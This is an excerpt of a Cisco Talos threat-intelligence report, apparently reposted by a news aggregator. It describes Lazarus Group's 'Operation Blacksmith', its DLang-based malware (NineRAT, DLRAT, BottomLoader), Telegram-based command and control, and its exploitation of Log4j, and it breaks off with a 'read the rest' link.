Cisco Talos recently discovered a new campaign conducted by the Lazarus Group we’re calling “Operation Blacksmith,” employing at least three new DLang-based malware families, two of which are remote access trojans (RATs), where one of these uses Telegram bots and channels as a medium of command and control (C2) communications. We track this Telegram-based RAT as “NineRAT” and the non-Telegram-based RAT as “DLRAT.” We track the DLang-based downloader as “BottomLoader.”Our latest findings indicate a definitive shift in the tactics of the North Korean APT group Lazarus Group. Over the past year and a half, Talos has disclosed three different remote access trojans (RATs) built using uncommon technologies in their development, like QtFramework, PowerBasic and, now, DLang.Talos has observed an overlap between our findings in this campaign conducted by Lazarus including tactics, techniques and procedures (TTPs) consistent with the North Korean state-sponsored group Onyx Sleet (PLUTIONIUM), also known as the Andariel APT group. Andariel is widely considered to be an APT sub-group under the Lazarus umbrella. This campaign consists of continued opportunistic targeting of enterprises globally that publicly host and expose their vulnerable infrastructure to n-day vulnerability exploitation such as CVE-2021-44228 (Log4j). We have observed Lazarus target manufacturing, agricultural and physical security companies.

Lazarus Group’s, Operation Blacksmith compromised manufacturing, agriculture and physical security sectors

Operation Blacksmith involved the exploitation of CVE-2021-44228, also known as
Support the originator by clicking the read the rest link below.